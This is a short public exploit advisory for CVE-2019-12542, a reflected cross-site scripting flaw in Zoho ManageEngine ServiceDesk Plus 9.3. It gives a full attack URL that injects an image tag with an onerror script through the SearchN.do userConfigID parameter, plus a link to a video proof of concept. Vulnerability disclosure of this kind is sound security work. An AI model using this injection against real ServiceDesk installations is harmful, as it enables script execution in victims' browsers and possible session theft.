# ExploitTitle:ZohoManageEngineServiceDeskPlus9.3Cross-SiteScripting via SearchN.do
# Date:2019-06-04
# ExploitAuthor:TarantulaTeam-VinCSS(a member of Vingroup)
# VendorHomepage: https://www.manageengine.com/products/service-desk
# Version:ZohoManageEngineServiceDeskPlus9.3
# CVE:CVE-2019-12542An issue was discovered in ZohoManageEngineServiceDeskPlus9.3.There is XSS via the SearchN.do userConfigID parameter.
Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=SitePoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view